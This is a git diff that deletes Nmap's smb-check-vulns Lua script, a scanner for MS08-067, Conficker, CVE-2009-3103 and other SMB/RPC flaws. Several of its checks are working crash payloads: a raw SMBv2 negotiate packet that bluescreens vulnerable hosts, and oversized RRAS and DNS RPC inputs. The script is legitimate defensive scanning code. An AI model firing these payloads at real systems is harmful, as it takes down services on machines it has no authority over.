diff --git a/scripts/smb-check-vulns.nse b/scripts/smb-check-vulns.nse
deleted file mode 100644
index 938129d80..000000000
--- a/scripts/smb-check-vulns.nse
+++ /dev/null
@@ -1,682 +0,0 @@
-local msrpc = require "msrpc"
-local nmap = require "nmap"
-local smb = require "smb"
-local stdnse = require "stdnse"
-local string = require "string"
-local table = require "table"
-
-description = [[
-Checks for vulnerabilities:
-* MS08-067, a Windows RPC vulnerability
-* Conficker, an infection by the Conficker worm
-* Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in Windows 2000
-* SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
-* MS06-025, a Windows Ras RPC service vulnerability
-* MS07-029, a Windows Dns Server RPC service vulnerability
-
-WARNING: These checks are dangerous, and are very likely to bring down a server.
-These should not be run in a production environment unless you (and, more importantly,
-the business) understand the risks!
-
-As a system administrator, performing these kinds of checks is crucial, because
-a lot more damage can be done by a worm or a hacker using this vulnerability than
-by a scanner. Penetration testers, on the other hand, might not want to use this
-script -- crashing services is not generally a good way of sneaking through a
-network.
-
-If you set the script parameter unsafe, then scripts will run that are almost
-(or totally) guaranteed to crash a vulnerable system; do NOT specify unsafe
-in a production environment! And that isn't to say that non-unsafe scripts will
-not crash a system, they're just less likely to.
-
-If you set the script parameter safe, then script will run that rarely or never
-crash a vulnerable system. No promises, though.
-
-MS08-067. Checks if a host is vulnerable to MS08-067, a Windows RPC vulnerability that
-can allow remote code execution. Checking for MS08-067 is very dangerous, as the check
-is likely to crash systems. On a fairly wide scan conducted by Brandon Enright, we determined
-that on average, a vulnerable system is more likely to crash than to survive
-the check. Out of 82 vulnerable systems, 52 crashed.
-At the same time, MS08-067 is extremely critical to fix. Metasploit has a working and
-stable exploit for it, and any system vulnerable can very easily be compromised.
-Conficker. Checks if a host is infected with a known Conficker strain. This check
-is based on the simple conficker scanner found on this page:
-http://iv.cs.uni-bonn.de/wg/cs/applications/containing-conficker.
-Thanks to the folks who wrote that scanner!
-
-regsvc DoS. Checks if a host is vulnerable to a crash in regsvc, caused
-by a null pointer dereference. I inadvertently discovered this crash while working
-on smb-enum-sessions, and discovered that it was repeatable. It's been
-reported to Microsoft (case #MSRC8742).
-
-This check WILL crash the service, if it's vulnerable, and requires a guest account
-or higher to work. It is considered unsafe.
-
-SMBv2 DoS. Performs a denial-of-service against the vulnerability disclosed in
-CVE-2009-3103. Checks if the server went offline. This works against Windows Vista
-and some versions of Windows 7, and causes a bluescreen if successful. The
-proof-of-concept code at http://seclists.org/fulldisclosure/2009/Sep/39 was used,
-with one small change.
-
-MS06-025. Vulnerability targets the RasRpcSumbitRequest() RPC method which is
-a part of RASRPC interface that serves as a RPC service for configuring and
-getting information from the Remote Access and Routing service. RASRPC can be
-accessed using either "\ROUTER" SMB pipe or the "\SRVSVC" SMB pipe (usually on Windows XP machines).
-This is in RPC world known as "ncan_np" RPC transport. RasRpcSumbitRequest()
-method is a generic method which provides different functionalities according
-to the RequestBuffer structure and particularly the RegType field within that
-structure. RegType field is of enum ReqTypes type. This enum type lists all
-the different available operation that can be performed using the RasRpcSubmitRequest()
-RPC method. The one particular operation that this vuln targets is the REQTYPE_GETDEVCONFIG
-request to get device information on the RRAS.
-
-MS07-029. Vulnerability targets the R_DnssrvQuery() and R_DnssrvQuery2() RPC method which is
-a part of DNS Server RPC interface that serves as a RPC service for configuring and
-getting information from the DNS Server service. DNS Server RPC service can be
-accessed using "\dnsserver" SMB named pipe. The vulnerability is triggered when
-a long string is send as the "zone" parameter which causes the buffer overflow which
-crashes the service.
-
-(Note: if you have other SMB/MSRPC vulnerability checks you'd like to see added, and
-you can show me a tool with a license that is compatible with Nmap's, post a request
-on the nmap-dev mailing list and I'll add it to my list [Ron Bowes].)
-]]
----
---@usage
--- nmap --script smb-check-vulns.nse -p445
--- sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139
---
---@output
--- Host script results:
--- | smb-check-vulns:
--- | MS08-067: NOT VULNERABLE
--- | Conficker: Likely CLEAN
--- | regsvc DoS: regsvc DoS: NOT VULNERABLE
--- | SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
--- | MS06-025: NO SERVICE (the Ras RPC service is inactive)
--- |_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
---
--- @args unsafe If set, this script will run checks that, if the system isn't
--- patched, are basically guaranteed to crash something. Remember that
--- non-unsafe checks aren't necessarily safe either)
--- @args safe If set, this script will only run checks that are known (or at
--- least suspected) to be safe.
------------------------------------------------------------------------
-
-author = "Ron Bowes"
-copyright = "Ron Bowes"
-license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
-categories = {"intrusive","exploit","dos","vuln"}
--- run after all smb-* scripts (so if it DOES crash something, it doesn't kill
--- other scans have had a chance to run)
-dependencies = {
- "smb-brute", "smb-enum-sessions", "smb-security-mode",
- "smb-enum-shares", "smb-server-stats",
- "smb-enum-domains", "smb-enum-users", "smb-system-info",
- "smb-enum-groups", "smb-os-discovery", "smb-enum-processes",
- "smb-psexec",
-};
-
-
-hostrule = function(host)
- return smb.get_port(host) ~= nil
-end
-
-local VULNERABLE = 1
-local PATCHED = 2
-local UNKNOWN = 3
-local NOTRUN = 4
-local INFECTED = 5
-local INFECTED2 = 6
-local CLEAN = 7
-local NOTUP = 8
-
----Check if the server is patched for MS08-067. This is done by calling NetPathCompare with an
--- illegal string. If the string is accepted, then the server is vulnerable; if it's rejected, then
--- you're safe (for now).
---
--- Based on a packet cap of this script, thanks go out to the author:
--- http://labs.portcullis.co.uk/application/ms08-067-check/
---
--- If there's a licensing issue, please let me (Ron Bowes) know so I can
---
--- NOTE: This CAN crash stuff (ie, crash svchost and force a reboot), so beware! In about 20
--- tests I did, it crashed once. This is not a guarantee.
---
---@param host The host object.
---@return (status, result) If status is false, result is an error code; otherwise, result is either
--- VULNERABLE for vulnerable, PATCHED for not vulnerable,
--- UNKNOWN if there was an error (likely vulnerable), NOTRUN
--- if this check was disabled, and INFECTED if it was patched by Conficker.
-function check_ms08_067(host)
- if(nmap.registry.args.safe ~= nil) then
- return true, NOTRUN
- end
- if(nmap.registry.args.unsafe == nil) then
- return true, NOTRUN
- end
- local status, smbstate
- local bind_result, netpathcompare_result
-
- -- Create the SMB session
- status, smbstate = msrpc.start_smb(host, "\\\\BROWSER")
- if(status == false) then
- return false, smbstate
- end
-
- -- Bind to SRVSVC service
- status, bind_result = msrpc.bind(smbstate, msrpc.SRVSVC_UUID, msrpc.SRVSVC_VERSION, nil)
- if(status == false) then
- msrpc.stop_smb(smbstate)
- return false, bind_result
- end
-
- -- Call netpathcanonicalize
- -- status, netpathcanonicalize_result = msrpc.srvsvc_netpathcanonicalize(smbstate, host.ip, "\\a", "\\test\\")
-
- local path1 = "\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\..\\n"
- local path2 = "\\n"
- status, netpathcompare_result = msrpc.srvsvc_netpathcompare(smbstate, host.ip, path1, path2, 1, 0)
-
- -- Stop the SMB session
- msrpc.stop_smb(smbstate)
-
- if(status == false) then
- if(string.find(netpathcompare_result, "WERR_INVALID_PARAMETER") ~= nil) then
- return true, INFECTED
- elseif(string.find(netpathcompare_result, "INVALID_NAME") ~= nil) then
- return true, PATCHED
- else
- return true, UNKNOWN, netpathcompare_result
- end
- end
-
-
- return true, VULNERABLE
-end
-
--- Help messages for the more common errors seen by the Conficker check.
-CONFICKER_ERROR_HELP = {
- ["NT_STATUS_BAD_NETWORK_NAME"] =
- [[UNKNOWN; Network name not found (required service has crashed). (Error NT_STATUS_BAD_NETWORK_NAME)]],
- -- http://seclists.org/nmap-dev/2009/q1/0918.html "non-Windows boxes (Samba on Linux/OS X, or a printer)"
- -- http://www.skullsecurity.org/blog/?p=209#comment-156
- -- "That means either it isn’t a Windows machine, or the service is
- -- either crashed or not running. That may indicate a failed (or
- -- successful) exploit attempt, or just a locked down system.
- -- NT_STATUS_OBJECT_NAME_NOT_FOUND can be returned if the browser
- -- service is disabled. There are at least two ways that can happen:
- -- 1) The service itself is disabled in the services list.
- -- 2) The registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Browser\Parameters\MaintainServerList
- -- is set to Off/False/No rather than Auto or yes.
- -- On these systems, if you reenable the browser service, then the
- -- test will complete."
- ["NT_STATUS_OBJECT_NAME_NOT_FOUND"] =
- [[UNKNOWN; not Windows, or Windows with disabled browser service (CLEAN); or Windows with crashed browser service (possibly INFECTED).
-| If you know the remote system is Windows, try rebooting it and scanning
-|_ again. (Error NT_STATUS_OBJECT_NAME_NOT_FOUND)]],
- -- http://www.skullsecurity.org/blog/?p=209#comment-100
- -- "That likely means that the server has been locked down, so we
- -- don’t have access to the necessary pipe. Fortunately, that means
- -- that neither does Conficker — NT_STATUS_ACCESS_DENIED probably
- -- means you’re ok."
- ["NT_STATUS_ACCESS_DENIED"] =
- [[Likely CLEAN; access was denied.
-| If you have a login, try using --script-args=smbuser=xxx,smbpass=yyy
-| (replace xxx and yyy with your username and password). Also try
-|_ smbdomain=zzz if you know the domain. (Error NT_STATUS_ACCESS_DENIED)]],
- -- The cause of these two is still unknown.
- -- ["NT_STATUS_NOT_SUPPORTED"] =
- -- [[]]
- -- http://thatsbroken.com/?cat=5 (doesn't seem common)
- -- ["NT_STATUS_REQUEST_NOT_ACCEPTED"] =
- -- [[]]
-}
-
----Check if the server is infected with Conficker. This can be detected by a modified MS08-067 patch,
--- which rejects a different illegal string than the official patch rejects.
---
--- Based loosely on the Simple Conficker Scanner, found here:
--- http://iv.cs.uni-bonn.de/wg/cs/applications/containing-conficker/
---
--- If there's a licensing issue, please let me (Ron Bowes) know so I can fix it
---
---@param host The host object.
---@return (status, result) If status is false, result is an error code; otherwise, result is either
--- INFECTED for infected or CLEAN for not infected.
-function check_conficker(host)
- local status, smbstate
- local bind_result, netpathcompare_result
-
- -- Create the SMB session
- status, smbstate = msrpc.start_smb(host, "\\\\BROWSER", true)
- if(status == false) then
- return false, smbstate
- end
-
- -- Bind to SRVSVC service
- status, bind_result = msrpc.bind(smbstate, msrpc.SRVSVC_UUID, msrpc.SRVSVC_VERSION, nil)
- if(status == false) then
- msrpc.stop_smb(smbstate)
- return false, bind_result
- end
-
- -- Try checking a valid string to find Conficker.D
- local netpathcanonicalize_result, error_result
- status, netpathcanonicalize_result, error_result = msrpc.srvsvc_netpathcanonicalize(smbstate, host.ip, "\\")
- if(status == true and netpathcanonicalize_result['can_path'] == 0x5c45005c) then
- msrpc.stop_smb(smbstate)
- return true, INFECTED2
- end
-
- -- Try checking an illegal string ("\..\") to find Conficker.C and earlier
- status, netpathcanonicalize_result, error_result = msrpc.srvsvc_netpathcanonicalize(smbstate, host.ip, "\\..\\")
-
- if(status == false) then
- if(string.find(netpathcanonicalize_result, "INVALID_NAME")) then
- msrpc.stop_smb(smbstate)
- return true, CLEAN
- elseif(string.find(netpathcanonicalize_result, "WERR_INVALID_PARAMETER") ~= nil) then
- msrpc.stop_smb(smbstate)
- return true, INFECTED
- else
- msrpc.stop_smb(smbstate)
- return false, netpathcanonicalize_result
- end
- end
-
- -- Stop the SMB session
- msrpc.stop_smb(smbstate)
-
- return true, CLEAN
-end
-
----While writing smb-enum-sessions I discovered a repeatable null-pointer dereference
--- in regsvc. I reported it to Microsoft, but because it's a simple DoS (and barely even that, because
--- the service automatically restarts), and because it's only in Windows 2000, it isn't likely that they'll
--- fix it. This function checks for that crash (by crashing the process).
---
--- The crash occurs when the string sent to winreg_enumkey() function is null.
---
---@param host The host object.
---@return (status, result) If status is false, result is an error code; otherwise, result is either
--- VULNERABLE for vulnerable or PATCHED for not vulnerable. If the check
--- was skipped, NOTRUN is returned.
-function check_winreg_Enum_crash(host)
- if(nmap.registry.args.safe ~= nil) then
- return true, NOTRUN
- end
- if(nmap.registry.args.unsafe == nil) then
- return true, NOTRUN
- end
-
- local i, j
- local elements = {}
- local status, bind_result, smbstate
-
- -- Create the SMB session
- status, smbstate = msrpc.start_smb(host, msrpc.WINREG_PATH)
- if(status == false) then
- return false, smbstate
- end
-
- -- Bind to WINREG service
- status, bind_result = msrpc.bind(smbstate, msrpc.WINREG_UUID, msrpc.WINREG_VERSION, nil)
- if(status == false) then
- msrpc.stop_smb(smbstate)
- return false, bind_result
- end
-
- local openhku_result
- status, openhku_result = msrpc.winreg_openhku(smbstate)
- if(status == false) then
- msrpc.stop_smb(smbstate)
- return false, openhku_result
- end
-
- -- Loop through the keys under HKEY_USERS and grab the names
- local enumkey_result
- status, enumkey_result = msrpc.winreg_enumkey(smbstate, openhku_result['handle'], 0, nil)
- msrpc.stop_smb(smbstate)
-
- if(status == false) then
- return true, VULNERABLE
- end
-
- return true, PATCHED
-end
-
-local function check_smbv2_dos(host)
- local status, result
-
- if(nmap.registry.args.safe ~= nil) then
- return true, NOTRUN
- end
- if(nmap.registry.args.unsafe == nil) then
- return true, NOTRUN
- end
-
- -- From http://seclists.org/fulldisclosure/2009/Sep/0039.html with one change on the last line.
- local buf = "\x00\x00\x00\x90" .. -- Begin SMB header: Session message
- "\xff\x53\x4d\x42" .. -- Server Component: SMB
- "\x72\x00\x00\x00" .. -- Negociate Protocol
- "\x00\x18\x53\xc8" .. -- Operation 0x18 & sub 0xc853
- "\x00\x26" .. -- Process ID High: --> :) normal value should be "\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" ..
- "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" ..
- "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" ..
- "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" ..
- "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" ..
- "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" ..
- "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" ..
- "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" ..
- "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" ..
- "\x30\x30\x32\x00"
-
- local socket = nmap.new_socket()
- if(socket == nil) then
- return false, "Couldn't create socket"
- end
-
- status, result = socket:connect(host, 445)
- if(status == false) then
- socket:close()
- return false, "Couldn't connect to host: " .. result
- end
-
- status, result = socket:send(buf)
- if(status == false) then
- socket:close()
- return false, "Couldn't send the buffer: " .. result
- end
-
- -- Close the socket
- socket:close()
-
- -- Give it some time to crash
- stdnse.debug1("Waiting 5 seconds to see if Windows crashed")
- stdnse.sleep(5)
-
- -- Create a new socket
- socket = nmap.new_socket()
- if(socket == nil) then
- return false, "Couldn't create socket"
- end
-
- -- Try and do something simple
- stdnse.debug1("Attempting to connect to the host")
- socket:set_timeout(5000)
- status, result = socket:connect(host, 445)
-
- -- Check the result
- if(status == false or status == nil) then
- stdnse.debug1("Connect failed, host is likely vulnerable!")
- socket:close()
- return true, VULNERABLE
- end
-
- -- Try sending something
- stdnse.debug1("Attempting to send data to the host")
- status, result = socket:send("AAAA")
- if(status == false or status == nil) then
- stdnse.debug1("Send failed, host is likely vulnerable!")
- socket:close()
- return true, VULNERABLE
- end
-
- stdnse.debug1("Checks finished; host is likely not vulnerable.")
- socket:close()
- return true, PATCHED
-end
-
-
----Check the existence of ms06_025 vulnerability in Microsoft Remote Routing
---and Access Service. This check is not safe as it crashes the RRAS service and
---its dependencies.
---@param host Host object.
---@return (status, result)
---* status == false -> result == NOTUP which designates
---that the targeted Ras RPC service is not active.
---* status == true ->
--- ** result == VULNERABLE for vulnerable.
--- ** result == PATCHED for not vulnerable.
--- ** result == NOTRUN if check skipped.
-function check_ms06_025(host)
- --check for safety flag
- if(nmap.registry.args.safe ~= nil) then
- return true, NOTRUN
- end
- if(nmap.registry.args.unsafe == nil) then
- return true, NOTRUN
- end
- --create the SMB session
- --first we try with the "\router" pipe, then the "\srvsvc" pipe.
- local status, smb_result, smbstate, err_msg
- status, smb_result = msrpc.start_smb(host, msrpc.ROUTER_PATH)
- if(status == false) then
- err_msg = smb_result
- status, smb_result = msrpc.start_smb(host, msrpc.SRVSVC_PATH) --rras is also accessible across SRVSVC pipe
- if(status == false) then
- return false, NOTUP --if not accessible across both pipes then service is inactive
- end
- end
- smbstate = smb_result
- --bind to RRAS service
- local bind_result
- status, bind_result = msrpc.bind(smbstate, msrpc.RASRPC_UUID, msrpc.RASRPC_VERSION, nil)
- if(status == false) then
- msrpc.stop_smb(smbstate)
- return false, UNKNOWN --if bind operation results with a false status we can't conclude anything.
- end
- if(bind_result['ack_result'] == 0x02) then --0x02 == PROVIDER_REJECTION
- msrpc.stop_smb(smbstate)
- return false, NOTUP --if bind operation results with true but PROVIDER_REJECTION, then the service is inactive.
- end
- local req, buff, sr_result
- req = msrpc.RRAS_marshall_RequestBuffer(
- 0x01,
- msrpc.RRAS_RegTypes['GETDEVCONFIG'],
- stdnse.generate_random_string(3000, "0123456789abcdefghijklmnoprstuvzxwyABCDEFGHIJKLMNOPRSTUVZXWY"))
- status, sr_result = msrpc.RRAS_SubmitRequest(smbstate, req)
- msrpc.stop_smb(smbstate)
- --sanity check
- if(status == false) then
- stdnse.debug3("check_ms06_025: RRAS_SubmitRequest failed")
- if(sr_result == "NT_STATUS_PIPE_BROKEN") then
- return true, VULNERABLE
- else
- return true, PATCHED
- end
- else
- return true, PATCHED
- end
-end
-
----Check the existence of ms07_029 vulnerability in Microsoft Dns Server service.
---This check is not safe as it crashes the Dns Server RPC service its dependencies.
---@param host Host object.
---@return (status, result)
---* status == false -> result == NOTUP which designates
---that the targeted Dns Server RPC service is not active.
---* status == true ->
--- ** result == VULNERABLE for vulnerable.
--- ** result == PATCHED for not vulnerable.
--- ** result == NOTRUN if check skipped.
-function check_ms07_029(host)
- --check for safety flag
- if(nmap.registry.args.safe ~= nil) then
- return true, NOTRUN
- end
- if(nmap.registry.args.unsafe == nil) then
- return true, NOTRUN
- end
- --create the SMB session
- local status, smbstate
- status, smbstate = msrpc.start_smb(host, msrpc.DNSSERVER_PATH)
- if(status == false) then
- return false, NOTUP --if not accessible across pipe then the service is inactive
- end
- --bind to DNSSERVER service
- local bind_result
- status, bind_result = msrpc.bind(smbstate, msrpc.DNSSERVER_UUID, msrpc.DNSSERVER_VERSION)
- if(status == false) then
- msrpc.stop_smb(smbstate)
- return false, UNKNOWN --if bind operation results with a false status we can't conclude anything.
- end
- --call
- local req_blob, q_result
- status, q_result = msrpc.DNSSERVER_Query(
- smbstate,
- "VULNSRV",
- string.rep("\\\13", 1000),
- 1)--any op num will do
- --sanity check
- msrpc.stop_smb(smbstate)
- if(status == false) then
- stdnse.debug3("check_ms07_029: DNSSERVER_Query failed")
- if(q_result == "NT_STATUS_PIPE_BROKEN") then
- return true, VULNERABLE
- else
- return true, PATCHED
- end
- else
- return true, PATCHED
- end
-end
-
----Returns the appropriate text to display, if any.
---
---@param check The name of the check; for example, 'ms08-067'.
---@param message The message to display, such as 'VULNERABLE' or 'PATCHED'.
---@param description [optional] Extra details about the message. nil for a blank message.
---@param minimum_verbosity The minimum verbosity level required before the message is displayed.
---@param minimum_debug [optional] The minimum debug level required before the message is displayed (default: 0).
---@return A string with a textual representation of the error (or empty string, if it was determined that the message shouldn't be displayed).
-local function get_response(check, message, description, minimum_verbosity, minimum_debug)
- if(minimum_debug == nil) then
- minimum_debug = 0
- end
-
- -- Check if we have appropriate verbosity/debug
- if(nmap.verbosity() >= minimum_verbosity and nmap.debugging() >= minimum_debug) then
- if(description == nil or description == '') then
- return string.format("%s: %s", check, message)
- else
- return string.format("%s: %s (%s)", check, message, description)
- end
- else
- return nil
- end
-end
-
-action = function(host)
-
- local status, result, message
- local response = {}
-
- -- Check for ms08-067
- status, result, message = check_ms08_067(host)
- if(status == false) then
- table.insert(response, get_response("MS08-067", "ERROR", result, 0, 1))
- else
- if(result == VULNERABLE) then
- table.insert(response, get_response("MS08-067", "VULNERABLE", nil, 0))
- elseif(result == UNKNOWN) then
- table.insert(response, get_response("MS08-067", "LIKELY VULNERABLE", "host stopped responding", 1)) -- TODO: this isn't very accurate
- elseif(result == NOTRUN) then
- table.insert(response, get_response("MS08-067", "CHECK DISABLED", "add '--script-args=unsafe=1' to run", 1))
- elseif(result == INFECTED) then
- table.insert(response, get_response("MS08-067", "NOT VULNERABLE", "likely by Conficker", 0))
- else
- table.insert(response, get_response("MS08-067", "NOT VULNERABLE", nil, 1))
- end
- end
-
- -- Check for Conficker
- status, result = check_conficker(host)
- if(status == false) then
- local msg = CONFICKER_ERROR_HELP[result] or "UNKNOWN; got error " .. result
- table.insert(response, get_response("Conficker", msg, nil, 1)) -- Only set verbosity for this, since it might be an error or it might be UNKNOWN
- else
- if(result == CLEAN) then
- table.insert(response, get_response("Conficker", "Likely CLEAN", nil, 1))
- elseif(result == INFECTED) then
- table.insert(response, get_response("Conficker", "Likely INFECTED", "by Conficker.C or lower", 0))
- elseif(result == INFECTED2) then
- table.insert(response, get_response("Conficker", "Likely INFECTED", "by Conficker.D or higher", 0))
- else
- table.insert(response, get_response("Conficker", "UNKNOWN", result, 0, 1))
- end
- end
-
- -- Check for a winreg_Enum crash
- status, result = check_winreg_Enum_crash(host)
- if(status == false) then
- table.insert(response, get_response("regsvc DoS", "ERROR", result, 0, 1))
- else
- if(result == VULNERABLE) then
- table.insert(response, get_response("regsvc DoS", "VULNERABLE", nil, 0))
- elseif(result == NOTRUN) then
- table.insert(response, get_response("regsvc DoS", "CHECK DISABLED", "add '--script-args=unsafe=1' to run", 1))
- else
- table.insert(response, get_response("regsvc DoS", "NOT VULNERABLE", nil, 1))
- end
- end
-
- -- Check for SMBv2 vulnerability
- status, result = check_smbv2_dos(host)
- if(status == false) then
- table.insert(response, get_response("SMBv2 DoS (CVE-2009-3103)", "ERROR", result, 0, 1))
- else
- if(result == VULNERABLE) then
- table.insert(response, get_response("SMBv2 DoS (CVE-2009-3103)", "VULNERABLE", nil, 0))
- elseif(result == NOTRUN) then
- table.insert(response, get_response("SMBv2 DoS (CVE-2009-3103)", "CHECK DISABLED", "add '--script-args=unsafe=1' to run", 1))
- else
- table.insert(response, get_response("SMBv2 DoS (CVE-2009-3103)", "NOT VULNERABLE", nil, 1))
- end
- end
-
- -- Check for ms06-025
- status, result = check_ms06_025(host)
- if(status == false) then
- if(result == NOTUP) then
- table.insert(response, get_response("MS06-025", "NO SERVICE", "the Ras RPC service is inactive", 1))
- else
- table.insert(response, get_response("MS06-025", "ERROR", result, 0, 1))
- end
- else
- if(result == VULNERABLE) then
- table.insert(response, get_response("MS06-025", "VULNERABLE", nil, 0))
- elseif(result == NOTRUN) then
- table.insert(response, get_response("MS06-025", "CHECK DISABLED", "add '--script-args=unsafe=1' to run", 1))
- elseif(result == NOTUP) then
- table.insert(response, get_response("MS06-025", "NO SERVICE", "the Ras RPC service is inactive", 1))
- else
- table.insert(response, get_response("MS06-025", "NOT VULNERABLE", nil, 1))
- end
- end
-
- -- Check for ms07-029
- status, result = check_ms07_029(host)
- if(status == false) then
- if(result == NOTUP) then
- table.insert(response, get_response("MS07-029", "NO SERVICE", "the Dns Server RPC service is inactive", 1))
- else
- table.insert(response, get_response("MS07-029", "ERROR", result, 0, 1))
- end
- else
- if(result == VULNERABLE) then
- table.insert(response, get_response("MS07-029", "VULNERABLE", nil, 0))
- elseif(result == NOTRUN) then
- table.insert(response, get_response("MS07-029", "CHECK DISABLED", "add '--script-args=unsafe=1' to run", 1))
- else
- table.insert(response, get_response("MS07-029", "NOT VULNERABLE", nil, 1))
- end
- end
-
- return stdnse.format_output(true, response)
-end
-
-
-